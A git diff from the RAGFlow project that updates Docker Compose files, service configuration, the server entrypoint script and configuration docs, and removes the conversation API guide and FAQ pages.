|
||||
|
||||
@ -50,7 +50,7 @@ The serving port of mysql inside the container. The modification should be synch
|
||||
The max database connection.
|
||||
|
||||
### stale_timeout
|
||||
The timeout duation in seconds.
|
||||
The timeout duration in seconds.
|
||||
|
||||
## minio
|
||||
|
||||
@ -67,7 +67,7 @@ The serving IP and port inside the docker container. This is not updating until
|
||||
Newly signed-up users use LLM configured by this part. Otherwise, user need to configure his own LLM in *setting*.
|
||||
|
||||
### factory
|
||||
The LLM suppliers. 'Tongyi-Qianwen', "OpenAI", "Moonshot" and "ZHIPU-AI" are supported.
|
||||
The LLM suppliers. "OpenAI", "Tongyi-Qianwen", "ZHIPU-AI", "Moonshot", "DeepSeek", "Baichuan", and "VolcEngine" are supported.
|
||||
|
||||
### api_key
|
||||
The corresponding API key of your assigned LLM vendor.
|
||||
|
||||
30
docker/docker-compose-CN-oc9.yml
Normal file
30
docker/docker-compose-CN-oc9.yml
Normal file
@ -0,0 +1,30 @@
|
||||
include:
|
||||
- path: ./docker-compose-base.yml
|
||||
env_file: ./.env
|
||||
|
||||
services:
|
||||
ragflow:
|
||||
depends_on:
|
||||
mysql:
|
||||
condition: service_healthy
|
||||
es01:
|
||||
condition: service_healthy
|
||||
image: edwardelric233/ragflow:oc9
|
||||
container_name: ragflow-server
|
||||
ports:
|
||||
- ${SVR_HTTP_PORT}:9380
|
||||
- 80:80
|
||||
- 443:443
|
||||
volumes:
|
||||
- ./service_conf.yaml:/ragflow/conf/service_conf.yaml
|
||||
- ./ragflow-logs:/ragflow/logs
|
||||
- ./nginx/ragflow.conf:/etc/nginx/conf.d/ragflow.conf
|
||||
- ./nginx/proxy.conf:/etc/nginx/proxy.conf
|
||||
- ./nginx/nginx.conf:/etc/nginx/nginx.conf
|
||||
environment:
|
||||
- TZ=${TIMEZONE}
|
||||
- HF_ENDPOINT=https://hf-mirror.com
|
||||
- MACOS=${MACOS}
|
||||
networks:
|
||||
- ragflow
|
||||
restart: always
|
||||
@ -9,7 +9,7 @@ services:
|
||||
condition: service_healthy
|
||||
es01:
|
||||
condition: service_healthy
|
||||
image: swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow:v0.2.0
|
||||
image: swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow:${RAGFLOW_VERSION}
|
||||
container_name: ragflow-server
|
||||
ports:
|
||||
- ${SVR_HTTP_PORT}:9380
|
||||
@ -24,6 +24,7 @@ services:
|
||||
environment:
|
||||
- TZ=${TIMEZONE}
|
||||
- HF_ENDPOINT=https://hf-mirror.com
|
||||
- MACOS=${MACOS}
|
||||
networks:
|
||||
- ragflow
|
||||
restart: always
|
||||
|
||||
@ -8,12 +8,12 @@ services:
|
||||
- ${ES_PORT}:9200
|
||||
environment:
|
||||
- node.name=es01
|
||||
- cluster.name=${CLUSTER_NAME}
|
||||
- cluster.initial_master_nodes=es01
|
||||
- ELASTIC_PASSWORD=${ELASTIC_PASSWORD}
|
||||
- bootstrap.memory_lock=false
|
||||
- xpack.security.enabled=false
|
||||
- cluster.max_shards_per_node=4096
|
||||
- discovery.type=single-node
|
||||
- xpack.security.enabled=true
|
||||
- xpack.security.http.ssl.enabled=false
|
||||
- xpack.security.transport.ssl.enabled=false
|
||||
- TZ=${TIMEZONE}
|
||||
mem_limit: ${MEM_LIMIT}
|
||||
ulimits:
|
||||
@ -29,24 +29,6 @@ services:
|
||||
- ragflow
|
||||
restart: always
|
||||
|
||||
kibana:
|
||||
depends_on:
|
||||
es01:
|
||||
condition: service_healthy
|
||||
image: docker.elastic.co/kibana/kibana:${STACK_VERSION}
|
||||
container_name: ragflow-kibana
|
||||
volumes:
|
||||
- kibanadata:/usr/share/kibana/data
|
||||
ports:
|
||||
- ${KIBANA_PORT}:5601
|
||||
environment:
|
||||
- SERVERNAME=kibana
|
||||
- ELASTICSEARCH_HOSTS=http://es01:9200
|
||||
- TZ=${TIMEZONE}
|
||||
mem_limit: ${MEM_LIMIT}
|
||||
networks:
|
||||
- ragflow
|
||||
|
||||
mysql:
|
||||
image: mysql:5.7.18
|
||||
container_name: ragflow-mysql
|
||||
@ -74,14 +56,13 @@ services:
|
||||
retries: 3
|
||||
restart: always
|
||||
|
||||
|
||||
minio:
|
||||
image: quay.io/minio/minio:RELEASE.2023-12-20T01-00-02Z
|
||||
container_name: ragflow-minio
|
||||
command: server --console-address ":9001" /data
|
||||
ports:
|
||||
- 9000:9000
|
||||
- 9001:9001
|
||||
- ${MINIO_PORT}:9000
|
||||
- ${MINIO_CONSOLE_PORT}:9001
|
||||
environment:
|
||||
- MINIO_ROOT_USER=${MINIO_USER}
|
||||
- MINIO_ROOT_PASSWORD=${MINIO_PASSWORD}
|
||||
@ -92,16 +73,29 @@ services:
|
||||
- ragflow
|
||||
restart: always
|
||||
|
||||
redis:
|
||||
image: redis:7.2.4
|
||||
container_name: ragflow-redis
|
||||
command: redis-server --requirepass ${REDIS_PASSWORD} --maxmemory 128mb --maxmemory-policy allkeys-lru
|
||||
ports:
|
||||
- ${REDIS_PORT}:6379
|
||||
volumes:
|
||||
- redis_data:/data
|
||||
networks:
|
||||
- ragflow
|
||||
restart: always
|
||||
|
||||
|
||||
|
||||
volumes:
|
||||
esdata01:
|
||||
driver: local
|
||||
kibanadata:
|
||||
driver: local
|
||||
mysql_data:
|
||||
driver: local
|
||||
minio_data:
|
||||
driver: local
|
||||
redis_data:
|
||||
driver: local
|
||||
|
||||
networks:
|
||||
ragflow:
|
||||
|
||||
@ -9,7 +9,7 @@ services:
|
||||
condition: service_healthy
|
||||
es01:
|
||||
condition: service_healthy
|
||||
image: infiniflow/ragflow:v0.2.0
|
||||
image: infiniflow/ragflow:${RAGFLOW_VERSION}
|
||||
container_name: ragflow-server
|
||||
ports:
|
||||
- ${SVR_HTTP_PORT}:9380
|
||||
@ -24,6 +24,7 @@ services:
|
||||
environment:
|
||||
- TZ=${TIMEZONE}
|
||||
- HF_ENDPOINT=https://huggingface.co
|
||||
- MACOS=${MACOS}
|
||||
networks:
|
||||
- ragflow
|
||||
restart: always
|
||||
|
||||
@ -4,37 +4,24 @@
|
||||
|
||||
export LD_LIBRARY_PATH=/usr/lib/x86_64-linux-gnu/
|
||||
|
||||
PY=/root/miniconda3/envs/py11/bin/python
|
||||
PY=python3
|
||||
if [[ -z "$WS" || $WS -lt 1 ]]; then
|
||||
WS=1
|
||||
fi
|
||||
|
||||
function task_exe(){
|
||||
while [ 1 -eq 1 ];do
|
||||
$PY rag/svr/task_executor.py $1 $2;
|
||||
$PY rag/svr/task_executor.py ;
|
||||
done
|
||||
}
|
||||
|
||||
function watch_broker(){
|
||||
while [ 1 -eq 1 ];do
|
||||
C=`ps aux|grep "task_broker.py"|grep -v grep|wc -l`;
|
||||
if [ $C -lt 1 ];then
|
||||
$PY rag/svr/task_broker.py &
|
||||
fi
|
||||
sleep 5;
|
||||
done
|
||||
}
|
||||
|
||||
function task_bro(){
|
||||
sleep 160;
|
||||
watch_broker;
|
||||
}
|
||||
|
||||
task_bro &
|
||||
|
||||
WS=2
|
||||
for ((i=0;i<WS;i++))
|
||||
do
|
||||
task_exe $i $WS &
|
||||
task_exe &
|
||||
done
|
||||
|
||||
$PY api/ragflow_server.py
|
||||
while [ 1 -eq 1 ];do
|
||||
$PY api/ragflow_server.py
|
||||
done
|
||||
|
||||
wait;
|
||||
@ -15,6 +15,12 @@ minio:
|
||||
host: 'minio:9000'
|
||||
es:
|
||||
hosts: 'http://es01:9200'
|
||||
username: 'elastic'
|
||||
password: 'infini_rag_flow'
|
||||
redis:
|
||||
db: 1
|
||||
password: 'infini_rag_flow'
|
||||
host: 'redis:6379'
|
||||
user_default_llm:
|
||||
factory: 'Tongyi-Qianwen'
|
||||
api_key: 'sk-xxxxxxxxxxxxx'
|
||||
|
||||
8
docs/_category_.json
Normal file
8
docs/_category_.json
Normal file
@ -0,0 +1,8 @@
|
||||
{
|
||||
"label": "Get Started",
|
||||
"position": 1,
|
||||
"link": {
|
||||
"type": "generated-index",
|
||||
"description": "RAGFlow Quick Start"
|
||||
}
|
||||
}
|
||||
@ -1,303 +0,0 @@
|
||||
# Conversation API Instruction
|
||||
|
||||
## Base URL
|
||||
```buildoutcfg
|
||||
https://demo.ragflow.io/v1/
|
||||
```
|
||||
|
||||
## Authorization
|
||||
|
||||
All the APIs are authorized with API-Key. Please keep it save and private. Don't reveal it in any way from the front-end.
|
||||
The API-Key should put in the header of request:
|
||||
```buildoutcfg
|
||||
Authorization: Bearer {API_KEY}
|
||||
```
|
||||
|
||||
## Start a conversation
|
||||
|
||||
This should be called whenever there's new user coming to chat.
|
||||
### Path: /api/new_conversation
|
||||
### Method: GET
|
||||
### Parameter:
|
||||
|
||||
| name | type | optional | description|
|
||||
|------|-------|----|----|
|
||||
| user_id| string | No | It's for identifying user in order to search and calculate statistics.|
|
||||
|
||||
### Response
|
||||
```json
|
||||
{
|
||||
"data": {
|
||||
"create_date": "Fri, 12 Apr 2024 17:26:21 GMT",
|
||||
"create_time": 1712913981857,
|
||||
"dialog_id": "4f0a2e4cb9af11ee9ba20aef05f5e94f",
|
||||
"duration": 0.0,
|
||||
"id": "b9b2e098f8ae11ee9f45fa163e197198",
|
||||
"message": [
|
||||
{
|
||||
"content": "Hi, I'm your assistant, can I help you?",
|
||||
"role": "assistant"
|
||||
}
|
||||
],
|
||||
"reference": [],
|
||||
"tokens": 0,
|
||||
"update_date": "Fri, 12 Apr 2024 17:26:21 GMT",
|
||||
"update_time": 1712913981857,
|
||||
"user_id": "kevinhu"
|
||||
},
|
||||
"retcode": 0,
|
||||
"retmsg": "success"
|
||||
}
|
||||
```
|
||||
> data['id'] in response should be stored and will be used in every round of following conversation.
|
||||
|
||||
## Get history of a conversation
|
||||
|
||||
### Path: /api/conversation/\<id\>
|
||||
### Method: GET
|
||||
### Response
|
||||
```json
|
||||
{
|
||||
"data": {
|
||||
"create_date": "Mon, 01 Apr 2024 09:28:42 GMT",
|
||||
"create_time": 1711934922220,
|
||||
"dialog_id": "df4a4916d7bd11eeaa650242ac180006",
|
||||
"id": "2cae30fcefc711ee94140242ac180006",
|
||||
"message": [
|
||||
{
|
||||
"content": "Hi! I'm your assistant, what can I do for you?",
|
||||
"role": "assistant"
|
||||
},
|
||||
{
|
||||
"content": "What's the vit score for GPT-4?",
|
||||
"role": "user"
|
||||
},
|
||||
{
|
||||
"content": "The ViT Score for GPT-4 in the zero-shot scenario is 0.5058, and in the few-shot scenario, it is 0.6480. ##0$$",
|
||||
"role": "assistant"
|
||||
},
|
||||
{
|
||||
"content": "How is the nvlink topology like?",
|
||||
"role": "user"
|
||||
},
|
||||
{
|
||||
"content": "NVLink topology refers to the arrangement of connections between GPUs using NVIDIA's NVLink technology. Correct NVLink topology for NVIDIA A100 cards involves connecting one GPU to another through a series of NVLink bridges ##0$$. Each of the three attached bridges spans two PCIe slots, and for optimal performance and balanced bridge topology, all three NVLink bridges should be used when connecting two adjacent A100 cards.\n\nHere's a summary of the correct and incorrect topologies:\n\n- **Correct**: Both GPUs are connected via all three NVLink bridges, ensuring full bandwidth and proper communication.\n- **Incorrect**: Not using all three bridges or having an uneven connection configuration would result in suboptimal performance.\n\nIt's also important to note that for multi-CPU systems, both A100 cards in a bridged pair should be within the same CPU domain, unless each CPU has a single A100 PCIe card, in which case they can be bridged together.",
|
||||
"role": "assistant"
|
||||
}
|
||||
],
|
||||
"user_id": "user name",
|
||||
"reference": [
|
||||
{
|
||||
"chunks": [
|
||||
{
|
||||
"chunk_id": "d0bc7892c3ec4aeac071544fd56730a8",
|
||||
"content_ltks": "tabl 1:openagi task-solv perform under differ set for three closed-sourc llm . boldfac denot the highest score under each learn schema . metric gpt-3.5-turbo claude-2 gpt-4 zero few zero few zero few clip score 0.0 0.0 0.0 0.2543 0.0 0.3055 bert score 0.1914 0.3820 0.2111 0.5038 0.2076 0.6307 vit score 0.2437 0.7497 0.4082 0.5416 0.5058 0.6480 overal 0.1450 0.3772 0.2064 0.4332 0.2378 0.5281",
|
||||
"content_with_weight": "<table><caption>Table 1: OpenAGI task-solving performances under different settings for three closed-source LLMs. Boldface denotes the highest score under each learning schema.</caption>\n<tr><th rowspan=2 >Metrics</th><th >GPT-3.5-turbo</th><th></th><th >Claude-2</th><th >GPT-4</th></tr>\n<tr><th >Zero</th><th >Few</th><th >Zero Few</th><th >Zero Few</th></tr>\n<tr><td >CLIP Score</td><td >0.0</td><td >0.0</td><td >0.0 0.2543</td><td >0.0 0.3055</td></tr>\n<tr><td >BERT Score</td><td >0.1914</td><td >0.3820</td><td >0.2111 0.5038</td><td >0.2076 0.6307</td></tr>\n<tr><td >ViT Score</td><td >0.2437</td><td >0.7497</td><td >0.4082 0.5416</td><td >0.5058 0.6480</td></tr>\n<tr><td >Overall</td><td >0.1450</td><td >0.3772</td><td >0.2064 0.4332</td><td >0.2378 0.5281</td></tr>\n</table>",
|
||||
"doc_id": "c790da40ea8911ee928e0242ac180005",
|
||||
"docnm_kwd": "OpenAGI When LLM Meets Domain Experts.pdf",
|
||||
"img_id": "afab9fdad6e511eebdb20242ac180006-d0bc7892c3ec4aeac071544fd56730a8",
|
||||
"important_kwd": [],
|
||||
"kb_id": "afab9fdad6e511eebdb20242ac180006",
|
||||
"positions": [
|
||||
[
|
||||
9.0,
|
||||
159.9383341471354,
|
||||
472.1773274739583,
|
||||
223.58013916015625,
|
||||
307.86692301432294
|
||||
]
|
||||
],
|
||||
"similarity": 0.7310340654129031,
|
||||
"term_similarity": 0.7671974387781668,
|
||||
"vector_similarity": 0.40556370512552886
|
||||
},
|
||||
{
|
||||
"chunk_id": "7e2345d440383b756670e1b0f43a7007",
|
||||
"content_ltks": "5.5 experiment analysi the main experiment result are tabul in tab . 1 and 2 , showcas the result for closed-sourc and open-sourc llm , respect . the overal perform is calcul a the averag of cllp 8 bert and vit score . here , onli the task descript of the benchmark task are fed into llm(addit inform , such a the input prompt and llm\u2019output , is provid in fig . a.4 and a.5 in supplementari). broadli speak , closed-sourc llm demonstr superior perform on openagi task , with gpt-4 lead the pack under both zero-and few-shot scenario . in the open-sourc categori , llama-2-13b take the lead , consist post top result across variou learn schema--the perform possibl influenc by it larger model size . notabl , open-sourc llm significantli benefit from the tune method , particularli fine-tun and\u2019rltf . these method mark notic enhanc for flan-t5-larg , vicuna-7b , and llama-2-13b when compar with zero-shot and few-shot learn schema . in fact , each of these open-sourc model hit it pinnacl under the rltf approach . conclus , with rltf tune , the perform of llama-2-13b approach that of gpt-3.5 , illustr it potenti .",
|
||||
"content_with_weight": "5.5 Experimental Analysis\nThe main experimental results are tabulated in Tab. 1 and 2, showcasing the results for closed-source and open-source LLMs, respectively. The overall performance is calculated as the average of CLlP\n8\nBERT and ViT scores. Here, only the task descriptions of the benchmark tasks are fed into LLMs (additional information, such as the input prompt and LLMs\u2019 outputs, is provided in Fig. A.4 and A.5 in supplementary). Broadly speaking, closed-source LLMs demonstrate superior performance on OpenAGI tasks, with GPT-4 leading the pack under both zero- and few-shot scenarios. In the open-source category, LLaMA-2-13B takes the lead, consistently posting top results across various learning schema--the performance possibly influenced by its larger model size. Notably, open-source LLMs significantly benefit from the tuning methods, particularly Fine-tuning and\u2019 RLTF. These methods mark noticeable enhancements for Flan-T5-Large, Vicuna-7B, and LLaMA-2-13B when compared with zero-shot and few-shot learning schema. In fact, each of these open-source models hits its pinnacle under the RLTF approach. Conclusively, with RLTF tuning, the performance of LLaMA-2-13B approaches that of GPT-3.5, illustrating its potential.",
|
||||
"doc_id": "c790da40ea8911ee928e0242ac180005",
|
||||
"docnm_kwd": "OpenAGI When LLM Meets Domain Experts.pdf",
|
||||
"img_id": "afab9fdad6e511eebdb20242ac180006-7e2345d440383b756670e1b0f43a7007",
|
||||
"important_kwd": [],
|
||||
"kb_id": "afab9fdad6e511eebdb20242ac180006",
|
||||
"positions": [
|
||||
[
|
||||
8.0,
|
||||
107.3,
|
||||
508.90000000000003,
|
||||
686.3,
|
||||
697.0
|
||||
],
|
||||
],
|
||||
"similarity": 0.6691508616357027,
|
||||
"term_similarity": 0.6999011754270821,
|
||||
"vector_similarity": 0.39239803751328806
|
||||
},
|
||||
],
|
||||
"doc_aggs": [
|
||||
{
|
||||
"count": 8,
|
||||
"doc_id": "c790da40ea8911ee928e0242ac180005",
|
||||
"doc_name": "OpenAGI When LLM Meets Domain Experts.pdf"
|
||||
}
|
||||
],
|
||||
"total": 8
|
||||
},
|
||||
{
|
||||
"chunks": [
|
||||
{
|
||||
"chunk_id": "8c11a1edddb21ad2ae0c43b4a5dcfa62",
|
||||
"content_ltks": "nvlink bridg support nvidia\u00aenvlink\u00aei a high-spe point-to-point peer transfer connect , where one gpu can transfer data to and receiv data from one other gpu . the nvidia a100 card support nvlink bridg connect with a singl adjac a100 card . each of the three attach bridg span two pcie slot . to function correctli a well a to provid peak bridg bandwidth , bridg connect with an adjac a100 card must incorpor all three nvlink bridg . wherev an adjac pair of a100 card exist in the server , for best bridg perform and balanc bridg topolog , the a100 pair should be bridg . figur 4 illustr correct and incorrect a100 nvlink connect topolog . nvlink topolog\u2013top view figur 4. correct incorrect correct incorrect for system that featur multipl cpu , both a100 card of a bridg card pair should be within the same cpu domain\u2014that is , under the same cpu\u2019s topolog . ensur thi benefit workload applic perform . the onli except is for dual cpu system wherein each cpu ha a singl a100 pcie card under it;in that case , the two a100 pcie card in the system may be bridg togeth . a100 nvlink speed and bandwidth are given in the follow tabl . tabl 5. a100 nvlink speed and bandwidth paramet valu total nvlink bridg support by nvidia a100 3 total nvlink rx and tx lane support 96 data rate per nvidia a100 nvlink lane(each direct)50 gbp total maximum nvlink bandwidth 600 gbyte per second pb-10137-001_v03|8 nvidia a100 40gb pcie gpu acceler",
|
||||
"content_with_weight": "NVLink Bridge Support\nNVIDIA\u00aeNVLink\u00aeis a high-speed point-to-point peer transfer connection, where one GPU can transfer data to and receive data from one other GPU. The NVIDIA A100 card supports NVLink bridge connection with a single adjacent A100 card.\nEach of the three attached bridges spans two PCIe slots. To function correctly as well as to provide peak bridge bandwidth, bridge connection with an adjacent A100 card must incorporate all three NVLink bridges. Wherever an adjacent pair of A100 cards exists in the server, for best bridging performance and balanced bridge topology, the A100 pair should be bridged. Figure 4 illustrates correct and incorrect A100 NVLink connection topologies.\nNVLink Topology \u2013Top Views \nFigure 4. \nCORRECT \nINCORRECT \nCORRECT \nINCORRECT \nFor systems that feature multiple CPUs, both A100 cards of a bridged card pair should be within the same CPU domain\u2014that is, under the same CPU\u2019s topology. Ensuring this benefits workload application performance. The only exception is for dual CPU systems wherein each CPU has a single A100 PCIe card under it; in that case, the two A100 PCIe cards in the system may be bridged together.\nA100 NVLink speed and bandwidth are given in the following table.\n<table><caption>Table 5. A100 NVLink Speed and Bandwidth </caption>\n<tr><th >Parameter </th><th >Value </th></tr>\n<tr><td >Total NVLink bridges supported by NVIDIA A100 </td><td >3 </td></tr>\n<tr><td >Total NVLink Rx and Tx lanes supported </td><td >96 </td></tr>\n<tr><td >Data rate per NVIDIA A100 NVLink lane (each direction)</td><td >50 Gbps </td></tr>\n<tr><td >Total maximum NVLink bandwidth</td><td >600 Gbytes per second </td></tr>\n</table>\nPB-10137-001_v03 |8\nNVIDIA A100 40GB PCIe GPU Accelerator",
|
||||
"doc_id": "806d1ed0ea9311ee860a0242ac180005",
|
||||
"docnm_kwd": "A100-PCIE-Prduct-Brief.pdf",
|
||||
"img_id": "afab9fdad6e511eebdb20242ac180006-8c11a1edddb21ad2ae0c43b4a5dcfa62",
|
||||
"important_kwd": [],
|
||||
"kb_id": "afab9fdad6e511eebdb20242ac180006",
|
||||
"positions": [
|
||||
[
|
||||
12.0,
|
||||
84.0,
|
||||
541.3,
|
||||
76.7,
|
||||
96.7
|
||||
],
|
||||
],
|
||||
"similarity": 0.3200748779905588,
|
||||
"term_similarity": 0.3082244010114718,
|
||||
"vector_similarity": 0.42672917080234146
|
||||
},
|
||||
],
|
||||
"doc_aggs": [
|
||||
{
|
||||
"count": 1,
|
||||
"doc_id": "806d1ed0ea9311ee860a0242ac180005",
|
||||
"doc_name": "A100-PCIE-Prduct-Brief.pdf"
|
||||
}
|
||||
],
|
||||
"total": 3
|
||||
}
|
||||
],
|
||||
"update_date": "Tue, 02 Apr 2024 09:07:49 GMT",
|
||||
"update_time": 1712020069421
|
||||
},
|
||||
"retcode": 0,
|
||||
"retmsg": "success"
|
||||
}
|
||||
```
|
||||
|
||||
- **message**: All the chat history in it.
|
||||
- role: user or assistant
|
||||
- content: the text content of user or assistant. The citations are in format like: ##0$$. The number in the middle indicate which part in data.reference.chunks it refers to.
|
||||
|
||||
- **user_id**: This is set by the caller.
|
||||
- **reference**: Every item in it refer to the corresponding message in data.message whose role is assistant.
|
||||
- chunks
|
||||
- content_with_weight: The content of chunk.
|
||||
- docnm_kwd: the document name.
|
||||
- img_id: the image id of the chunk. It is an optional field only for PDF/pptx/picture. And accessed by 'GET' /document/get/\<id\>.
|
||||
- positions: [page_number, [upleft corner(x, y)], [right bottom(x, y)]], the chunk position, only for PDF.
|
||||
- similarity: the hybrid similarity.
|
||||
- term_similarity: keyword simimlarity
|
||||
- vector_similarity: embedding similarity
|
||||
- doc_aggs:
|
||||
- doc_id: the document can be accessed by 'GET' /document/get/\<id\>
|
||||
- doc_name: the file name
|
||||
- count: the chunk number hit in this document.
|
||||
|
||||
## Chat
|
||||
|
||||
This will be called to get the answer to users' questions.
|
||||
|
||||
### Path: /api/completion
|
||||
### Method: POST
|
||||
### Parameter:
|
||||
|
||||
| name | type | optional | description|
|
||||
|------|-------|----|----|
|
||||
| conversation_id| string | No | This is from calling /new_conversation.|
|
||||
| messages| json | No | All the conversation history stored here including the latest user's question.|
|
||||
|
||||
### Response
|
||||
```json
|
||||
{
|
||||
"data": {
|
||||
"answer": "The ViT Score for GPT-4 in the zero-shot scenario is 0.5058, and in the few-shot scenario, it is 0.6480. ##0$$",
|
||||
"reference": {
|
||||
"chunks": [
|
||||
{
|
||||
"chunk_id": "d0bc7892c3ec4aeac071544fd56730a8",
|
||||
"content_ltks": "tabl 1:openagi task-solv perform under differ set for three closed-sourc llm . boldfac denot the highest score under each learn schema . metric gpt-3.5-turbo claude-2 gpt-4 zero few zero few zero few clip score 0.0 0.0 0.0 0.2543 0.0 0.3055 bert score 0.1914 0.3820 0.2111 0.5038 0.2076 0.6307 vit score 0.2437 0.7497 0.4082 0.5416 0.5058 0.6480 overal 0.1450 0.3772 0.2064 0.4332 0.2378 0.5281",
|
||||
"content_with_weight": "<table><caption>Table 1: OpenAGI task-solving performances under different settings for three closed-source LLMs. Boldface denotes the highest score under each learning schema.</caption>\n<tr><th rowspan=2 >Metrics</th><th >GPT-3.5-turbo</th><th></th><th >Claude-2</th><th >GPT-4</th></tr>\n<tr><th >Zero</th><th >Few</th><th >Zero Few</th><th >Zero Few</th></tr>\n<tr><td >CLIP Score</td><td >0.0</td><td >0.0</td><td >0.0 0.2543</td><td >0.0 0.3055</td></tr>\n<tr><td >BERT Score</td><td >0.1914</td><td >0.3820</td><td >0.2111 0.5038</td><td >0.2076 0.6307</td></tr>\n<tr><td >ViT Score</td><td >0.2437</td><td >0.7497</td><td >0.4082 0.5416</td><td >0.5058 0.6480</td></tr>\n<tr><td >Overall</td><td >0.1450</td><td >0.3772</td><td >0.2064 0.4332</td><td >0.2378 0.5281</td></tr>\n</table>",
|
||||
"doc_id": "c790da40ea8911ee928e0242ac180005",
|
||||
"docnm_kwd": "OpenAGI When LLM Meets Domain Experts.pdf",
|
||||
"img_id": "afab9fdad6e511eebdb20242ac180006-d0bc7892c3ec4aeac071544fd56730a8",
|
||||
"important_kwd": [],
|
||||
"kb_id": "afab9fdad6e511eebdb20242ac180006",
|
||||
"positions": [
|
||||
[
|
||||
9.0,
|
||||
159.9383341471354,
|
||||
472.1773274739583,
|
||||
223.58013916015625,
|
||||
307.86692301432294
|
||||
]
|
||||
],
|
||||
"similarity": 0.7310340654129031,
|
||||
"term_similarity": 0.7671974387781668,
|
||||
"vector_similarity": 0.40556370512552886
|
||||
},
|
||||
{
|
||||
"chunk_id": "7e2345d440383b756670e1b0f43a7007",
|
||||
"content_ltks": "5.5 experiment analysi the main experiment result are tabul in tab . 1 and 2 , showcas the result for closed-sourc and open-sourc llm , respect . the overal perform is calcul a the averag of cllp 8 bert and vit score . here , onli the task descript of the benchmark task are fed into llm(addit inform , such a the input prompt and llm\u2019output , is provid in fig . a.4 and a.5 in supplementari). broadli speak , closed-sourc llm demonstr superior perform on openagi task , with gpt-4 lead the pack under both zero-and few-shot scenario . in the open-sourc categori , llama-2-13b take the lead , consist post top result across variou learn schema--the perform possibl influenc by it larger model size . notabl , open-sourc llm significantli benefit from the tune method , particularli fine-tun and\u2019rltf . these method mark notic enhanc for flan-t5-larg , vicuna-7b , and llama-2-13b when compar with zero-shot and few-shot learn schema . in fact , each of these open-sourc model hit it pinnacl under the rltf approach . conclus , with rltf tune , the perform of llama-2-13b approach that of gpt-3.5 , illustr it potenti .",
|
||||
"content_with_weight": "5.5 Experimental Analysis\nThe main experimental results are tabulated in Tab. 1 and 2, showcasing the results for closed-source and open-source LLMs, respectively. The overall performance is calculated as the average of CLlP\n8\nBERT and ViT scores. Here, only the task descriptions of the benchmark tasks are fed into LLMs (additional information, such as the input prompt and LLMs\u2019 outputs, is provided in Fig. A.4 and A.5 in supplementary). Broadly speaking, closed-source LLMs demonstrate superior performance on OpenAGI tasks, with GPT-4 leading the pack under both zero- and few-shot scenarios. In the open-source category, LLaMA-2-13B takes the lead, consistently posting top results across various learning schema--the performance possibly influenced by its larger model size. Notably, open-source LLMs significantly benefit from the tuning methods, particularly Fine-tuning and\u2019 RLTF. These methods mark noticeable enhancements for Flan-T5-Large, Vicuna-7B, and LLaMA-2-13B when compared with zero-shot and few-shot learning schema. In fact, each of these open-source models hits its pinnacle under the RLTF approach. Conclusively, with RLTF tuning, the performance of LLaMA-2-13B approaches that of GPT-3.5, illustrating its potential.",
|
||||
"doc_id": "c790da40ea8911ee928e0242ac180005",
|
||||
"docnm_kwd": "OpenAGI When LLM Meets Domain Experts.pdf",
|
||||
"img_id": "afab9fdad6e511eebdb20242ac180006-7e2345d440383b756670e1b0f43a7007",
|
||||
"important_kwd": [],
|
||||
"kb_id": "afab9fdad6e511eebdb20242ac180006",
|
||||
"positions": [
|
||||
[
|
||||
8.0,
|
||||
107.3,
|
||||
508.90000000000003,
|
||||
686.3,
|
||||
697.0
|
||||
]
|
||||
],
|
||||
"similarity": 0.6691508616357027,
|
||||
"term_similarity": 0.6999011754270821,
|
||||
"vector_similarity": 0.39239803751328806
|
||||
}
|
||||
],
|
||||
"doc_aggs": {
|
||||
"OpenAGI When LLM Meets Domain Experts.pdf": 4
|
||||
},
|
||||
"total": 8
|
||||
}
|
||||
},
|
||||
"retcode": 0,
|
||||
"retmsg": "success"
|
||||
}
|
||||
```
|
||||
|
||||
- **answer**: The replay of the chat bot.
|
||||
- **reference**:
|
||||
- chunks: Every item in it refer to the corresponding message in answer.
|
||||
- content_with_weight: The content of chunk.
|
||||
- docnm_kwd: the document name.
|
||||
- img_id: the image id of the chunk. It is an optional field only for PDF/pptx/picture. And accessed by 'GET' /document/get/\<id\>.
|
||||
- positions: [page_number, [upleft corner(x, y)], [right bottom(x, y)]], the chunk position, only for PDF.
|
||||
- similarity: the hybrid similarity.
|
||||
- term_similarity: keyword simimlarity
|
||||
- vector_similarity: embedding similarity
|
||||
- doc_aggs:
|
||||
- doc_id: the document can be accessed by 'GET' /document/get/\<id\>
|
||||
- doc_name: the file name
|
||||
- count: the chunk number hit in this document.
|
||||
|
||||
## Get document content or image
|
||||
|
||||
This is usually used when display content of citation.
|
||||
### Path: /document/get/\<id\>
|
||||
### Method: GET
|
||||
164
docs/faq.md
164
docs/faq.md
@ -1,164 +0,0 @@
|
||||
# Frequently Asked Questions
|
||||
|
||||
## General
|
||||
|
||||
### What sets RAGFlow apart from other RAG products?
|
||||
|
||||
The "garbage in garbage out" status quo remains unchanged despite the fact that LLMs have advanced Natural Language Processing (NLP) significantly. In response, RAGFlow introduces two unique features compared to other Retrieval-Augmented Generation (RAG) products.
|
||||
|
||||
- Fine-grained document parsing: Document parsing involves images and tables, with the flexibility for you to intervene as needed.
|
||||
- Traceable answers with reduced hallucinations: You can trust RAGFlow's responses as you can view the citations and references supporting them.
|
||||
|
||||
### Which languages does RAGFlow support?
|
||||
|
||||
English, simplified Chinese, traditional Chinese for now.
|
||||
|
||||
## Performance
|
||||
|
||||
### Why does it take longer for RAGFlow to parse a document than LangChain?
|
||||
|
||||
We put painstaking effort into document pre-processing tasks like layout analysis, table structure recognition, and OCR (Optical Character Recognition) using our vision model. This contributes to the additional time required.
|
||||
|
||||
## Feature
|
||||
|
||||
### Which architectures or devices does RAGFlow support?
|
||||
|
||||
ARM64 and Ascend GPU are not supported.
|
||||
|
||||
### Do you offer an API for integration with third-party applications?
|
||||
|
||||
These APIs are still in development. Contributions are welcome.
|
||||
|
||||
### Do you support stream output?
|
||||
|
||||
No, this feature is still in development. Contributions are welcome.
|
||||
|
||||
### Is it possible to share dialogue through URL?
|
||||
|
||||
This feature and the related APIs are still in development. Contributions are welcome.
|
||||
|
||||
### Do you support multiple rounds of dialogues, i.e., referencing previous dialogues as context for the current dialogue?
|
||||
|
||||
This feature and the related APIs are still in development. Contributions are welcome.
|
||||
|
||||
## Configurations
|
||||
|
||||
### How to increase the length of RAGFlow responses?
|
||||
|
||||
1. Right click the desired dialog to display the **Chat Configuration** window.
|
||||
2. Switch to the **Model Setting** tab and adjust the **Max Tokens** slider to get the desired length.
|
||||
3. Click **OK** to confirm your change.
|
||||
|
||||
|
||||
### What does Empty response mean? How to set it?
|
||||
|
||||
